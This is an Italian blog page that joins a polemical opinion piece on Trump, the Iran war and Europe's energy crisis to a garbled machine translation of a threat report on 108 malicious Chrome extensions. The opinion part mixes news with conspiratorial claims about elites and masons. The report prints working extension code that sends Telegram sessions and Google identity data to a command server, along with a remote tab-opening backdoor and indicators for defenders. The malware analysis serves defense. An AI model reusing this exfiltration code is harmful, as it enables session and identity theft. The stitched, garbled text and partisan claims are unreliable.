Governo mondiale e stranezze della Globalizzazione risparmiatori consumatori spogliati dall'inflazione e dalla speculazione,banche sempre meno trasparenti.Imbevitori di ogni sorta pronti a qualsiasi cosa purché di guadagni facili.Politici con nuove leggi che gravano sempre più sul comune cittadino,illuminati maghi,filantropi,onlus,coop,sette religiose,massoni.Piramidi sempre più perfette e ben studiate.
La parola fondi che in realtà significa che non saranno mai riempiti a discapito di qualcuno.
Bisogna ammettere che una parte considerevole del pubblico Europeo soffre della fase terminale del masochismo civilizzato, quando letteralmente tutto ciò che accade nelle loro terre natali viene paragonato a “economie corrette” e “mercati corretti”, dopodiché non resta che placare la loro sete di correttezza con la linfa di betulla dei loro pioppi nativi.
In questa situazione, è ancora più difficile capire perché la situazione negli stessi Stati Uniti, in cui per definizione tutto è sempre corretto, assomigli a una scena del Titanic, dove un Trump felice sta con le braccia tese sulla prua dell’economia americana, e gli investitori internazionali, sbalorditi dalla musica coraggiosa, dal vento e dalle onde, lo abbracciano da dietro..
L’unica parola che può descrivere ciò che sta accadendo nel mercato azionario americano è follia.
In questo momento, secondo l’IEA, l’S&P 500 e il Nasdaq stanno toccando i massimi storici, nonostante il blocco dello Stretto di Hormuz, il rischio di nuovi combattimenti, l’interruzione delle catene di approvvigionamento globali e la “più grande interruzione della fornitura di petrolio della storia”..
I principali media mondiali stanno attualmente dedicando materiale importante a questo fenomeno e le principali conclusioni sono le seguenti::
– gli investitori sono pienamente fiduciosi che il conflitto in Medio Oriente sia “un episodio a breve termine che verrà risolto in tempi relativamente brevi»;
– «i mercati hanno una memoria" - gli investitori sono abituati a credere che il presidente degli Stati Uniti Donald Trump si ritirerà se la sofferenza economica diventa troppo grave (effetto TACO - Trump Always Chickens Out, ovvero "Trump finisce sempre per tirarsi indietro"»).
In un esempio recente, Trump ha imposto tariffe massicce ai partner commerciali statunitensi nell’aprile 2025, ma in pochi giorni ha annunciato una pausa di 90 giorni, dopo la quale il mercato azionario ha registrato uno dei maggiori guadagni giornalieri della storia..
Proprio ieri, Trump ha promesso al mondo un calo “senza precedenti” dei prezzi dell’energia dopo che gli Stati Uniti avranno posto fine alla storia dell’Iran, ma ciò non accadrà, perché è impossibile.
La risorsa analitica Recorded Future descrive così lo scenario di base, cioè il più neutrale, per porre fine al conflitto: "Un fragile cessate il fuoco riduce l'intensità degli attacchi militari diretti, ma le cause del conflitto rimangono irrisolte. <...> Lo Stretto di Hormuz si apre solo sporadicamente, con ripetute interruzioni, ispezioni e incidenti di sicurezza, lasciando i mercati marittimi, assicurativi ed energetici sotto costante pressione." Ma lo scenario potrebbe essere peggiore.
Il portale economico Euro Perspectives è ancora meno ottimista: "Anche con un cessate il fuoco con l'Iran, il mondo sta già pagando il più grande shock energetico degli ultimi 50 anni. Gli effetti di un'ondata inflazionistica si diffonderanno in tutta l'economia europea - e questa ondata non può più essere fermata».
Non puntiamo il dito contro questi fortunati, perché si dirà ancora che la maledizione delle risorse non è di moda, e nella società perbene rideranno.
Colpo decisivo: Trump ha causato danni per 28 miliardi di dollari all’energia europea, e la cifra è in crescita
Colpo decisivo: Trump ha causato danni per 28 miliardi di dollari all´energia europea, e la cifra è in crescita.
L’Unione Europea ha introdotto con urgenza una serie di misure di emergenza pianificate per mitigarne l’impatto economicodopo un forte aumento dei prezzi dell’energia.
Le misure proposte mercoledì sottolineano il danno economico che la guerra degli Stati Uniti e di Israele all’Iran sta infliggendo all’Europa, che solo di recente si è ripresa dalla crisi energetica stile 2022. Alcune industrie stanno già lottando per sopravvivere, scrive la CNN.
– Lo ha affermato la Commissione europea, il braccio esecutivo dell'Ue, in una nota in cui illustra dettagliatamente le misure adottate.
Dall’inizio della guerra, il blocco ha speso altri 24 miliardi di euro (28 miliardi di dollari) in importazioni di energia a causa dell’aumento dei prezzi – ovvero più di 587 milioni di dollari al giorno, “senza ricevere una sola molecola aggiuntiva di energia”, ha affermato..
La durezza delle dichiarazioni e della formulazione del rapporto introduttivo mostra quanto sia arrabbiata l'UE con Donald Trump, che ha scatenato una guerra nella regione del petrolio e del gas del pianeta, che ha colpito non solo lui stesso, ma anche paesi terzi non coinvolti nel conflitto.
I piani del blocco includono la creazione di un organismo paneuropeo per identificare rapidamente potenziali carenze di carburante e diesel per l’aviazione e per coordinare gli scambi di carburante o eventuali rilasci di scorte di emergenza tra gli Stati membri dell’UE..
Il forte calo delle forniture di petrolio e gas naturale causato dalla guerra con l’Iran, che ha già colpito duramente l’Asia, si sta estendendo costantemente all’Occidente. Anche se i potenziali colloqui di pace mettessero fine al conflitto questa settimana, almeno una parte del danno all’economia europea è già stata fatta.
L’elenco dei problemi che le famiglie e le imprese devono affrontare cresce ogni settimana, dall’aumento dei prezzi del gas e dei prodotti alimentari al numero sempre maggiore di voli aerei..
Per alcune imprese le conseguenze della crisi energetica sono state particolarmente devastanti. Ad esempio, secondo l'esecutivo del blocco, un certo numero di pescatori europei hanno smesso completamente di pescare perché i loro profitti sono stati duramente colpiti dall'aumento dei prezzi dell'energia e delle materie prime..
L’aumento dei prezzi della plastica e dei detersivi potrebbe avere ripercussioni anche sulle imprese e sulle famiglie. La tedesca BASF, uno dei più grandi produttori chimici del mondo, ha aumentato i prezzi di tutto, dall'acido formico, utilizzato nei mangimi per animali, ai prodotti per la casa, in alcuni casi di oltre 30%.
L’Associazione tedesca dell’industria chimica ha dichiarato questa settimana alla CNN che la guerra con l’Iran ha inferto un “duro colpo” alle speranze di una svolta economica nella più grande economia europea, la Germania, quest’anno..
Per la seconda volta in meno di cinque anni, gli europei stanno pagando il prezzo della dipendenza dell’Europa dai combustibili fossili importati per le scelte disastrose di incompetenti non eletti dal popolo europeo che governano l´Europa,per loro l´importante è trovare i 90 miliardi da mandare all'Ucraina a dispetto delle sofferenze degli europei.
4/16/2026
Una
campagna composta da 108 estensioni raccoglie identità, ruba
sessioni e aggiunge backdoor ai browser, il tutto legato alla
stessa infrastruttura C2.
Kush Pandya
Il
team di ricerca sulle minacce di Socket ha identificato 108
estensioni Chrome dannose che operano come una campagna coordinata
nell'ambito di un'infrastruttura C2 condivisa su cloudapi[.]stream.
Le estensioni sono pubblicate sotto cinque distinte identità di
editori (Yana Project, GameGen, SideGames, Rodeo Games e InterAlt)
e rappresentano collettivamente circa 20.000 installazioni del
Chrome Web Store. Tutti e 108 instradano credenziali rubate,
identità utente e dati di navigazione verso server controllati
dallo stesso operatore. Le estensioni rimangono attive al momento
della scrittura. Abbiamo inviato richieste di rimozione al team di
sicurezza del Chrome Web Store e a Google Navigazione sicura.
La
campagna abbraccia diverse categorie di minacce attraverso 108
estensioni:
54
estensioni rubare l'identità
dell'account Google tramite OAuth2
1
estensione esfiltra attivamente le
sessioni Web di Telegram ogni 15 secondi
1
estensione include un'infrastruttura
organizzata per il furto delle sessioni di Telegram (non ancora
attivata)
2
estensioni rimuovi le intestazioni di
sicurezza di YouTube e inserisci annunci
1
estensione rimuove le intestazioni di
sicurezza di TikTok e inserisce annunci
2
estensioni inserire script di contenuto
in ogni pagina visitata dall'utente
1
estensione inoltra tutte le richieste di
traduzione attraverso il server dell'autore della minaccia
45
estensioni contengono una backdoor
universale che apre URL arbitrari all'avvio del browser
Le
108 estensioni sono pubblicate in diverse categorie di
prodotti: client della barra laterale di Telegram, giochi di
slot machine e Keno, potenziatori di YouTube e TikTok, uno
strumento di traduzione di testo ed estensioni di utilità
della pagina. Ciascuno si rivolge a un diverso tipo di utente,
ma condividono tutti lo stesso backend.
Gli
utenti che installano un'estensione della barra laterale di
Telegram vedono un'interfaccia di chat funzionale. Gli utenti
che installano un gioco di slot ottengono un gioco
funzionante. La superficie legittima esiste, ma esiste anche
il codice dannoso in esecuzione in background, connesso a un
server C2 che può rubare identità, esfiltrare sessioni e
aprire URL arbitrari nel browser dell'utente.
L'estensione
più grave della campagna è Telegram
Multi-account (obifanppcpchlehkjipahhphbcbjekfa).
Ruba la sessione Web attiva di Telegram dal browser della
vittima e la trasmette a tg[.]cloudapi[.]stream/save_session.php ogni
15 secondi.
Come
funziona il furto:
L'estensione
inietta content.js in https://web.telegram.org/* A document_start.
Al caricamento, chiama immediatamente getSessionDataJson(),
che serializza l'intera pagina localStorage ed
estrae il user_auth token
utilizzato da Telegram Web per autenticare la sessione. Lo
invia allo script in background tramite chrome.runtime.sendMessage,
che lo inoltra al server C2.
// content.js// Analyst note: Runs immediately on page load, before the user interacts with anything.let getInfo = getSessionDataJson();
if (getInfo.user_id !== null) {
chrome.runtime.sendMessage({ action: "save_session", data: JSON.stringify(getInfo) });
}
// content.js// Analyst note: Sends the full session to the C2 every 15 seconds for the lifetime of the tab.setInterval(async () => {
let getInfo = getSessionDataJson();
if (getInfo.user_id !== null) {
await chrome.runtime.sendMessage({ action: "save_session", data: JSON.stringify(getInfo) });
}
}, 15000);
La
sceneggiatura di sfondo (background.js)
quindi invia i dati al C2:
L'estensione
gestisce anche un messaggio in entrata (set_session_changed)
che esegue l'operazione inversa: cancella il localStorage
della vittima, lo sovrascrive con i dati di sessione forniti
dall'attore della minaccia e ricarica forzatamente Telegram.
Ciò consente all'operatore di scambiare il browser di
qualsiasi vittima con un altro account Telegram all'insaputa
della vittima.
// content.js// Analyst note: The C2 can push any session data back to the extension.// This replaces the victim's active Telegram session with the threat actor's chosen session.if (message.action === 'set_session_changed') {
let data = JSON.parse(message.data);
localStorage.clear();
clearAllCookies();
for (var k in data) { localStorage.setItem(k, data[k]); }
setTimeout(() => { window.location = "https://web.telegram.org/k/?r_=" + Math.random(); }, 500);
}
Un
battito cardiaco di 30 secondi (sidepanel.js)
sondaggi tg[.]cloudapi[.]stream/count_sessions.php,
dando all'operatore una visione in tempo reale di quante
sessioni attive sono disponibili.
Ladro
di Telegram messo in scena (Teleside):
Una
seconda estensione, Web
Client for Telegram - Teleside (mdcfennpfgkngnibjbpnpaafcjnhcjno,
circa 1.000 installazioni), ha tutta l'infrastruttura per il
furto di sessioni: rimuove gli header CSP, X-Frame-Options e
CORS di Telegram tramite declarativeNetRequest,
inserisce uno script di contenuto in document_start SU telegram.org,
e imposta web_accessible_resources:
["*"]. Il codice antifurto attivo è assente dalla
v3.8.0. L'estensione è basata su un trojan SidebarGPT base
di codice. IL loadInfo() la
backdoor presente nello script in background consentirebbe
all'operatore di attivare o aggiornare il payload senza
inviare un aggiornamento del Chrome Web Store. Inoltre, content-sidebar.html mostra
un overlay di gioco d'azzardo attivo: un div gameSession
impostato su display:block da
cui viene pubblicato un banner a grandezza naturale multiaccount[.]cloudapi[.]stream/game.html direttamente
sopra la barra laterale dell'estensione.
54
delle 108 estensioni dannose rubano l'identità dell'account
Google dell'utente la prima volta che l'utente fa clic sul
pulsante di accesso. Il codice è identico per tutti 54:
chrome.identity.getAuthToken({
interactive: true }) acquisisce un token
Bearer di Google OAuth2.
PUBBLICA {email,
name, picture, sub} A https://mines[.]cloudapi[.]stream/auth_google.
// popup/auth.js (akebbllmckjphjiojeioooidhnddnplj, and 53 identical copies across the campaign)// (Russian comment): // Проверка на уже авторизованного пользователя// ("Check for already authenticated user")
loginBtn.addEventListener("click", async () => {
chrome.identity.getAuthToken({ interactive: true }, async (token) => {
// Analyst note: token is a real Google OAuth2 Bearer token acquired via the// chrome.identity API. The user sees a standard Google sign-in prompt.const res = awaitfetch("https://www.googleapis.com/oauth2/v3/userinfo", {
headers: { Authorization: `Bearer ${token}` }
});
const profile = await res.json();
// Analyst note: The profile is sent to the threat actor's server, not to any// legitimate backend for the extension's stated functionality.const r = awaitfetch("https://mines[.]cloudapi[.]stream/auth_google", {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({
email: profile.email,
name: profile.name,
picture: profile.picture,
sub: profile.sub// Persistent Google account identifier
})
});
});
});
Il
token OAuth viene utilizzato localmente e non lascia mai il
browser. Ciò che arriva al server dell'operatore è solo un record
di identità permanente: l'e-mail, il nome e l'immagine del profilo
della vittima.
IL sub Il
campo è un identificatore dell'account Google stabile e
multiservizio che non cambia quando un utente modifica la password
o l'indirizzo email. In combinazione con l'e-mail e il nome,
fornisce all'operatore un record persistente dell'identità Google
di ciascuna vittima collegata all'estensione assegnata user_id sul cloudapi[.]stream back-end.
Ciò non consente all'operatore di accedere all'account Google
della vittima.
Tutte
le 54 estensioni utilizzano gli ID client OAuth2 di soli due
progetti Google Cloud: project 1096126762051 (31
ID cliente) e progetto 170835003632 (25
ID cliente). 56 ID cliente univoci su 54 estensioni riconducono
tutti agli stessi due numeri di progetto, dimostrando che un unico
operatore controlla tutti gli account degli editori nonostante
cinque diversi nomi di editori sul Chrome Web Store.
45
le estensioni nella campagna includono una funzione identica nello
script in background. Viene eseguito una volta ad ogni avvio del
browser:
// background.js (present in 45 extensions, confirmed by automated grep across extracted CRX files)// Analyst note: This runs automatically when Chrome starts and the service worker initializes.// The server can return any URL to be opened as a new tab in the victim's browser.asyncfunctionloadInfo() {
const response = awaitfetch("https://mines[.]cloudapi[.]stream/user_info", {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({ type: 'background', ext: chrome.runtime.id })
});
const result = await response.json();
if (result && result.success && result.infoURL) {
chrome.tabs.create({ url: result.infoURL });
}
}
loadInfo();
Il
server dell'operatore riceve l'ID dell'estensione ad ogni avvio
del browser. Se la risposta include infoURL,
l'estensione apre silenziosamente l'URL in una nuova scheda. Non
esiste alcuna restrizione sull'URL che il server può restituire.
Questo canale sopravvive al riavvio del browser e funziona
indipendentemente dal fatto che l'utente apra o meno l'estensione.
In
due estensioni (Page Locker e Page Auto Refresh), il loadInfo() la
funzione è stilisticamente incoerente con il codice minimizzato
circostante: utilizza clean async/await sintassi
mentre il resto del file viene minimizzato. Ciò indica che la
funzione è stata inserita dopo la scrittura del codice originale
dell'estensione, coerentemente con un operatore che ha acquisito o
riproposto estensioni esistenti e ha aggiunto la backdoor.
Lo
stesso user_info la
risposta che trasporta infoURL guida anche l'iniezione diretta del
DOM su 78 estensioni. Ogni estensione di gioco e casinò nella
campagna include a userpage.js file
che prende due campi dalla risposta C2 e li scrive nella pagina
utilizzando innerHTML senza
sanificazione:
// app/userpage.js (present across 78 extensions)// Analyst note: result.rating and result.protxt arrive from mines[.]cloudapi[.]stream/user_info.// No sanitization before DOM assignment — the C2 can push arbitrary HTML to any user's extension page.if (result.rating) {
ratingPlayers.innerHTML = result.rating;
}
if (result.protxt) {
proplansID.innerHTML = result.protxt;
proplansID.classList.remove('h_');
}
result.rating popola
il pannello della classifica. result.protxt popola
la sezione di upsell dei Piani Pro e la nasconde. Il server C2 può
sostituire entrambi i campi con HTML arbitrario, inclusi blocchi
di script, ad ogni visita all'interfaccia utente dell'estensione.
Questo è un canale di injection distinto da loadInfo(): dove la
backdoor apre una nuova scheda, l'iniezione di contenuto
controllata dal server riscrive l'interfaccia dell'estensione.
Bypass
dell'intestazione di sicurezza tramite dichiarativeNetRequest#
Cinque
estensioni utilizzano Chrome declarativeNetRequest API
per rimuovere le intestazioni di sicurezza dai siti di
destinazione prima che la pagina venga caricata. Lo schema è
identico per tutti e cinque: rimuovi Content-Security-Policy, X-Frame-Options,
E Content-Security-Policy-Report-Only;
impostato Access-Control-Allow-Origin:
*; e falsificare il User-Agent, Origin,
E Referer intestazioni
per rappresentare il sito di destinazione stesso.
Le
cinque estensioni e i loro obiettivi:
Telegram
Multi-account (obifanppcpchlehkjipahhphbcbjekfa):
obiettivi web.telegram.org,
fa lo spoofing dell'User-Agent su iPhone Safari
Teleside (mdcfennpfgkngnibjbpnpaafcjnhcjno):
obiettivi web.telegram.org,
fa lo spoofing dell'User-Agent su iPhone Safari
YouSide (mmecpiobcdbjkaijljohghhpfgngpjmk):
obiettivi youtube.com,
fa lo spoofing dell'User-Agent su Chrome 140
SideYou (bfoofgelpmalhcmedaaeogahlmbkopfd):
obiettivi youtube.com,
fa lo spoofing dell'User-Agent su Chrome 125
Web
Client for TikTok (cbfhnceafaenchbefokkngcbnejached):
obiettivi www.tiktok.com,
fa lo spoofing dell'User-Agent su Chrome 125
Tutti
e cinque sono stati confermati dalla lettura rules_1.json direttamente
da ogni file CRX estratto.
YouSide
inserisce inoltre un overlay di gioco d'azzardo nella sua barra
laterale: a gameSession div
impostato su display:block inserendo
un banner pubblicitario da multiaccount[.]cloudapi[.]stream/game.html sull'incorporamento
di YouTube.
L'estensione
TikTok ne aggiunge un secondo declarativeNetRequest regola
che consente incondizionatamente tutte le connessioni WebSocket su
tutti gli URL, rimuovendo qualsiasi restrizione a livello di rete
sul traffico WebSocket dalle pagine TikTok. La sua sceneggiatura
del contenuto (sys-content.js)
inserisce un collegamento e un'immagine da multiaccount[.]cloudapi[.]stream/game.html in
ogni pagina TikTok visitata dall'utente.
IL ukraine.html Il
file in bundle con l'estensione TikTok funge da politica sulla
privacy. Contiene l'e-mail di contatto kiev3381917@gmail[.]com e
porta il titolo della pagina "Informativa sulla privacy -
Estensione della barra laterale di Telegram", un artefatto
copia-incolla da un'estensione diversa nella campagna che conferma
che lo stesso autore ha scritto entrambi.
Text
Translation (ogogpebnagniggbnkbpjioobomdbmdcj)
si presenta come una barra laterale di traduzione standard. Quando
un utente si registra, il estensione invia
la propria email e il nome completo a https://api[.]cloudapi[.]stream:8443/Register e
riceve in cambio una chiave API.
// main.js// Analyst note: User email and name are sent to the threat actor's server at registration.// The returned API key is stored in localStorage and attached to every translation request.const url = 'https://api[.]cloudapi[.]stream:8443/Register';
// ...localStorage.setItem('settings', JSON.stringify({
email: $("#email").val(),
name: $("#name").val(),
key: result_.key
}));
Ogni
richiesta di traduzione viene elaborata https://api[.]cloudapi[.]stream:8443/Translation con
la chiave API dell'utente allegata come file X-Key intestazione.
Il server dell'operatore riceve il testo completo di tutto ciò che
l'utente invia per la traduzione. Questa estensione richiede solo
il file sidePanel autorizzazione
e nessuna autorizzazione host, quindi non genera avvisi di
autorizzazione durante l'installazione.
Tutte
le 108 estensioni dannose condividono lo stesso backend, ospitato
su 144[.]126[.]135[.]238 (Contabo
GmbH VPS). Il dominio cloudapi[.]stream è
stato registrato il 30 aprile 2022 tramite Hosting Ukraine LLC. Il
server esegue un'istanza Strapi CMS sulla porta 1337 con un
database PostgreSQL.
I
sottodomini confermati e i loro ruoli:
tg[.]cloudapi[.]stream:
Esfiltrazione della sessione di Telegram, sei endpoint inclusi /save_session.php, /get_sessions.php, /delete_session.php,
E /count_sessions.php (7
estensioni)
mines[.]cloudapi[.]stream:
furto d'identità tramite /auth_google,
Faro C2 tramite /user_info (ritorna infoURL per
l'apertura remota delle schede), persistenza dello stato utente
(utilizzato da 94 estensioni)
topup[.]cloudapi[.]stream:
portale di pagamento e monetizzazione, confermando il modello
MaaS (collegato da 78 estensioni)
cdn[.]cloudapi[.]stream:
hosting di risorse di gioco (79 estensioni)
multiaccount[.]cloudapi[.]stream:
hub di iniezione di annunci, inserito direttamente in TikTok e
altre pagine (29 estensioni)
gamewss[.]cloudapi[.]stream:
Server di gioco WebSocket sulla porta 8447 (6 estensioni)
wheel[.]cloudapi[.]stream:
preposizionato in host_permissions di
76 estensioni ma non utilizzato in nessun codice osservato
api[.]cloudapi[.]stream:8443:
API di traduzione, registrazione utente e sorveglianza dei
contenuti (1 estensione)
chat[.]cloudapi[.]stream:
servizio chat (5 estensioni)
Un
dominio secondario, top[.]rodeo,
è elencato in host_permissions di
71 estensioni e utilizzato come backend del server di gioco. Nel
codice sorgente compaiono due varianti di endpoint: /server/remote.php E /server/remote3.php,
entrambi accettano uuid E extension_id parametri.
IL topup[.]cloudapi[.]stream portale
di pagamento e per utente user_id il
sistema conferma che funziona come piattaforma
Malware-as-a-Service. Alle vittime vengono assegnati account nel
CRM backend e le identità e le sessioni rubate sono accessibili a
chiunque acquisti l'accesso.
1.
Contraddizione diretta della dichiarazione sulla privacy di CWS
L'elenco
CWS di ogni estensione contiene un boilerplate dichiarazione: "Questo
sviluppatore dichiara che i tuoi dati non vengono utilizzati o
trasferiti per scopi estranei alla funzionalità principale
dell'articolo." Il codice di invio user_id A mines[.]cloudapi[.]stream/user_info ad
ogni avvio del browser, raccogliendo l'identità di Google tramite auth_google,
e l'apertura di URL specificati dall'operatore non ha nulla a che
fare con la funzione dichiarata di un gioco di slot o di un client
Telegram. Questa è una bugia verificabile nell'elenco stesso, non
un'interpretazione.
2.
Norme sui dati utente dei servizi API di Google: utilizzo
limitato
Estensioni
utilizzando chrome.identity.getAuthToken sono
vincolati da Google Requisiti
di utilizzo limitato. I dati del profilo ottenuti tramite
OAuth2 devono essere utilizzati solo per la funzionalità attivata
esplicitamente dall'utente. Instradarlo a un server C2 di terze
parti senza alcuna relazione rivelata con l'estensione è una
violazione diretta indipendentemente dal fatto che il token stesso
venga esfiltrato.
3.
Politica sugli annunci CWS
Iniezione
di un overlay per il gioco d'azzardo (multiaccount[.]cloudapi[.]stream/game.html)
nell'interfaccia utente dell'estensione senza il consenso
dell'utente o la divulgazione nell'elenco CWS viola il Chrome Web
Store politica richiedendo
che qualsiasi pubblicità sia chiaramente divulgata. In Teleside e
YouSide l'annuncio sostituisce interamente l'interfaccia utente
indicata.
L'e-mail
di contatto kiev3381917@gmail[.]com appare
in ukraine.html,
un file HTML di politica sulla privacy in bundle con l'estensione
SideYou (bfoofgelpmalhcmedaaeogahlmbkopfd).
Lo stesso file viene riutilizzato tra le estensioni: la copia
trovata in Web
Client for TikTok porta invariato il titolo
"Privacy Policy - Estensione Sidebar Telegram", collegando
direttamente le due estensioni allo stesso autore.
Tre
dei sette indirizzi email registrati contengono varianti
romanizzate della stessa stringa “nadejdin” e “nadiezhdin”: nadejdinv@gmail[.]com (collegato
a 16 estensioni), viktornadiezhdin@gmail[.]com (12
estensioni) e slava.nadejdin.kiev@gmail[.]com (2
estensioni).
I
commenti al codice in russo compaiono nel codice di autenticazione
e di furto di sessione su più estensioni. In content.js ,
il commento recita "userId ne najden" (userId non trovato) e in auth.js ,
si legge "Proverka na uzhe avtorizovannogo pol'zovatelya"
(Controlla se l'utente è già autenticato).
Scansione
Shodan di 144[.]126[.]135[.]238 confermando
l'hosting di Contabo Inc., ISP Nubes LLC (AS40021) e nove
porte aperte tra cui un server API Strapi su 1337 e
PostgreSQL su 5432.
Cinque
nomi di editori sul Chrome Web Store (Yana
Project, GameGen, SideGames, Rodeo
Games, E InterAlt)
si risolvono tutti negli stessi due numeri di progetto Google
Cloud: 1096126762051 E 170835003632.
Questa è la prova più forte a favore della proprietà unificata,
poiché 56 ID client OAuth2 univoci in tutte le 54 estensioni per
il furto di identità condividono solo queste due radici del
progetto.
Gli
utenti che hanno installato una delle 54 estensioni per il furto
di identità e hanno fatto clic sul pulsante di accesso hanno
ricevuto l'e-mail di Google, il nome completo, l'URL dell'immagine
del profilo e l'identificatore dell'account Google (sub)
trasmesso a mines[.]cloudapi[.]stream/auth_google.
IL sub il
valore non cambia quando un utente modifica la password o
l'indirizzo e-mail.
Utenti
che hanno installato Telegram
Multi-account (obifanppcpchlehkjipahhphbcbjekfa)
e aperto web.telegram.org mentre
l'estensione era attiva, la sessione Web di Telegram è stata
esfiltrata a intervalli di 15 secondi. Un autore di minacce con
una sessione rubata può accedere a tutti i messaggi, i contatti e
gli account collegati senza la password dell'utente o il codice di
autenticazione a due fattori.
Qualsiasi
browser con uno dei 45 loadInfo() le
estensioni backdoor installate rispondono ai comandi emessi dal
server ad ogni avvio del browser, anche se l'utente non apre mai
l'estensione.
In
tutte le 108 estensioni, sono state registrate circa 20.000
installazioni. Le estensioni destinate a Telegram rappresentano
circa 3.035 di tali installazioni.
Cerca
tra le estensioni Chrome installate uno qualsiasi degli ID
estensione nella sezione IOC di seguito e rimuovili
immediatamente.
Se
hai usato Telegram
Multi-account (obifanppcpchlehkjipahhphbcbjekfa)
mentre sei connesso a Telegram Web, esci da tutte le sessioni di
Telegram Web dall'app mobile di Telegram in Impostazioni >
Dispositivi > Termina tutte le altre sessioni.
Se
hai effettuato l'accesso a qualsiasi estensione di giochi di
slot, casinò o barra laterale utilizzando Google, tratta la tua
identità Google come esposta. Controlla l'accesso alle app di
terze parti su myaccount.google.com/permissions e
revocare eventuali voci sconosciute.
Se
hai installato Text
Translation (ogogpebnagniggbnkbpjioobomdbmdcj)
e registrato con la tua e-mail, l'indirizzo e-mail e il nome
vengono archiviati sul server dell'autore della minaccia.
Per
le squadre di sicurezza:
Bloccare cloudapi[.]stream e
tutti i suoi sottodomini a livello di rete. L'elenco completo è
nella sezione CIO di seguito.
Bloccare top[.]rodeo.
Contrassegna
le estensioni di Chrome nel tuo ambiente che dichiarano il file identity permesso
a fianco oauth2 ID
cliente dai numeri di progetto Google Cloud 1096126762051 O 170835003632.
IL loadInfo() modello
(POST a /user_info all'avvio
dell'operatore del servizio con l'ID estensione, aprire infoURL dalla
risposta) è un'impronta digitale rilevabile. Scansiona i
pacchetti di estensioni per la combinazione di user_info, infoURL,
E chrome.tabs.create.
declarativeNetRequest regole
che rimuovono content-security-policy provenienti
da siti di destinazione specificati non rappresentano un
comportamento standard e richiedono una revisione in qualsiasi
estensione.
Presa Protezione
dell'estensione Chrome analizza i bundle di
estensioni per rilevare flussi di dati nascosti, esfiltrazione di
credenziali non divulgate e backdoor C2, bloccando le estensioni
dannose prima che raggiungano gli endpoint dell'utente.
![Elenchi del Chrome Web Store che mostrano tutti e tre gli URL degli sviluppatori utilizzati nella campagna: https://top[.]rodeo/ (Slot Machine Multiconto Telegram e Barba Nera), https://webuk[.]tech/ (Blocco pagine) e https://interalt[.]net/ (InterAlt).](https://blogger.googleusercontent.com/img/a/AVvXsEhVjQaYHyO1s2z3o0oSmaVj3MtoSmbnFB6-NjGJ1Iu7llb1nwLG3Q0ue3GYPoy_PHT5GqTG-alUOsx6iyHA7_kFwszcR-eVRrx7CDYO5va1xwDo0LxCtLB45X9ZU-vpIoLb4BA4qWF3HJ49STtm6cYjDMlZIJR_ymq6bBvAXyyPkd_Ga3bzpKBMKfYF1XiH)
![Scansione Shodan di 144[.]126[.]135[.]238 confermando l'hosting di Contabo Inc., ISP Nubes LLC (AS40021) e nove porte aperte tra cui un server API Strapi su 1337 e PostgreSQL su 5432.](https://blogger.googleusercontent.com/img/a/AVvXsEjf0_JXvUUl8nFZfJnn3RDWIimLH8uu_Y64AZhWdgnE5agsgllKQAuurHMe7AbuU6r0BZtTLzZzyoiSVyC09LkCNRghDjSbcHY29NgDAdDJnd7Hw9yK-kwMN9PO2Cl8JhiTJbY87-NzSWJrlQCi_ttogLBHYnKqgUoLrb7vwwjOwZhSYZTnNDk2Z_Wp4RCh=w490-h170)
![topup[.]cloudapi[.]stream ora pubblica una pagina di RODEO GAMES STUDIO sulla descrizione di un'attività di monetizzazione di estensioni Chrome con "monetizzazione ben ponderata" ed elenco formatron.service@gmail[.]com come contatto di supporto.](https://blogger.googleusercontent.com/img/a/AVvXsEjfO6wEX3qpC8fc98M_dQxt5KSgG4a92zdC8qV4EyN8NVPNlpATUg4p52JwwcIgrt3UlJxatWqTdugrNbXgH6be6HUFLPwawgTD9xa45APzf9Dir-iimj4yNtRASgrOFK3v5ciG7WorThH_IzqqZAjv-ojGeKmk1X4l3rpHxKAqBKu4exKSs7K3YeWwUATd "topup[.]cloudapi[.]stream ora pubblica una pagina di RODEO GAMES STUDIO sulla descrizione di un'attività di monetizzazione di estensioni Chrome con \"monetizzazione ben ponderata\" ed elenco formatron.service@gmail[.]com come contatto di supporto.")
